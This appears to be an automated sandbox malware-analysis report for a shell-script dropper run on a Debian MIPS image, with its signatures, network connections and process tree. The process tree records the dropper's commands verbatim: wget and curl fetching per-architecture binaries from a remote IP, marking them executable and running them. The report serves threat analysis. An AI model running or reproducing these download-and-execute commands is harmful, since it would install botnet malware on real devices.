| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-24 01:19
Reported
2024-11-24 01:22
Platform
debian9-mipsel-20240226-en
Max time kernel
79s
Max time network
83s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /tmp/3AvA | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3AvA | /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh | N/A |
Processes
/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.x86]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]
/bin/cat
[cat UnHAnaAW.x86]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mips]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]
/bin/cat
[cat UnHAnaAW.mips]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]
/bin/cat
[cat UnHAnaAW.mpsl]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]
/bin/cat
[cat UnHAnaAW.arm4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm5]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]
/bin/cat
[cat UnHAnaAW.arm5]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm6]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]
/bin/cat
[cat UnHAnaAW.arm6]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm7]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]
/bin/cat
[cat UnHAnaAW.arm7]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.ppc]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]
/bin/cat
[cat UnHAnaAW.ppc]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.m68k]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]
/bin/cat
[cat UnHAnaAW.m68k]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.sh4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]
/bin/cat
[cat UnHAnaAW.sh4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp |